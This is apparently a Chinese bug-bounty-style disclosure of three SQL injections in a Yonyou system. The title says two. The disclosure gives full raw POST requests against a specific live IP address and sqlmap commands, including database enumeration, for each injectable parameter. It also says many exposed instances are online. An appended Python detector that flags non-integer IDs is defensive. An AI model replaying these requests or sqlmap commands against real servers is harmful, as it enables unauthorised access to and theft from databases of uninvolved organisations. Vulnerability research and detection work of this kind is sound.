### Brief description:
Two SQL injection vulnerabilities in a Yonyou (用友) system
### Details:
Someone already submitted a vulnerability in this system earlier:

[WooYun: Two SQL injections in a Yonyou Youpu U8 system (no login required, DBA privileges, 83 cases)](http://www.wooyun.org/bugs/wooyun-2015-0119763)

After a long search I finally found live cases, and so here come the vulnerabilities...
Three vulnerabilities in total:
0x01
SQL injection 1
Endpoint `/Server/CmxUserGroup.php?pgid=Group_DelUserOK`, POST body `UserID=1&OrgID=1`
```
POST /Server/CmxUserGroup.php?pgid=Group_DelUserOK HTTP/1.1
Referer: http://218.27.137.242:8080/
Cookie: RAS_Admin_UserInfo_UserName=1
Host: 218.27.137.242:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
UserID=1&OrgID=1
```
```
sqlmap.py -r p1.txt -p OrgID --dbms mysql
```
![1.png](https://images.seebug.org/upload/201507/06185322a6ff7d5517ea9a2cbedad3b22d08b4c8.png)
0x02
SQL injection 2
Endpoint `/Server/CmxSecurity.php?pgid=Security_AddUser`
```
POST /Server/CmxSecurity.php?pgid=Security_AddUser&SearchFlag=true HTTP/1.1
Referer: http://218.27.137.242:8080/
Cookie: RAS_Admin_UserInfo_UserName=1
Host: 218.27.137.242:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
SecurityID=1
```
```
sqlmap.py -r p1.txt -p SecurityID --dbms mysql
```
![1.png](https://images.seebug.org/upload/201507/0619014899bf17be0e20203d25c0d50203d6f29d.png)
0x03
SQL injection 3
Endpoint `/Server/CmxServer.php?pgid=Server_UpdateSave`
```
POST /Server/CmxServer.php?pgid=Server_UpdateSave HTTP/1.1
Referer: http://218.27.137.242:8080/
Cookie: RAS_Admin_UserInfo_UserName=1
Host: 218.27.137.242:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
ServerID=1
```
```
sqlmap.py -r p1.txt -p ServerID --dbms mysql
```
![3.png](https://images.seebug.org/upload/201507/06190303d9029469ccac779049f17f6f3e5ec65e.png)
There are many exposed instances online.
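All three reported parameters (`OrgID`, `SecurityID`, `ServerID`) are numeric IDs sent in the POST body to a fixed `/Server/Cmx*.php` endpoint, which makes the pattern easy to monitor for. The following is an added detection example, not code from the report or from the vendor; it parses a raw request in the same shape as the captures above and flags any watched parameter whose value is not a plain integer. The host name, the sample requests and the assumption that these IDs are always integers are mine.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint -> POST parameter reported as injectable (taken from the advisory above).
INJECTABLE_PARAMS = {
    "/Server/CmxUserGroup.php": {"OrgID"},
    "/Server/CmxSecurity.php": {"SecurityID"},
    "/Server/CmxServer.php": {"ServerID"},
}

# Every reported parameter is a numeric ID, so a value that is not a plain
# integer is the signal worth alerting on (assumption: these IDs are always integers).
INTEGER_ONLY = re.compile(r"^[0-9]+$")


def check_request(raw_request):
    """Parse one raw HTTP request and return (path, param, value) for every
    watched parameter whose value is not a plain integer."""
    head, _, body = raw_request.partition("\n\n")
    request_line = head.splitlines()[0]
    method, target, _version = request_line.split(" ", 2)
    path = urlsplit(target).path
    watched = INJECTABLE_PARAMS.get(path)
    if method != "POST" or watched is None:
        return []
    params = parse_qs(body, keep_blank_values=True)
    findings = []
    for name in sorted(watched):
        for value in params.get(name, []):
            if not INTEGER_ONLY.match(value):
                findings.append((path, name, value))
    return findings


# Constructed sample requests (the host is a placeholder, not an address from the report).
CLEAN_REQUEST = (
    "POST /Server/CmxUserGroup.php?pgid=Group_DelUserOK HTTP/1.1\n"
    "Host: target.example:8080\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "\n"
    "UserID=1&OrgID=1"
)
# Same request with a single quote appended to the watched parameter.
TAMPERED_REQUEST = CLEAN_REQUEST.replace("OrgID=1", "OrgID=1'")

if __name__ == "__main__":
    print(check_request(CLEAN_REQUEST))     # []
    print(check_request(TAMPERED_REQUEST))  # [('/Server/CmxUserGroup.php', 'OrgID', "1'")]
```

The same check, applied at the application boundary (reject non-integer IDs before they reach the query, and use prepared statements), is the fix rather than just the detection.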
### Proof of vulnerability:
```
sqlmap.py -r p1.txt -p ServerID --dbms mysql --dbs
```
![a.png](https://images.seebug.org/upload/201507/06191455ed1aeae8fddc4a34ed3e8f5b90b8295b.png)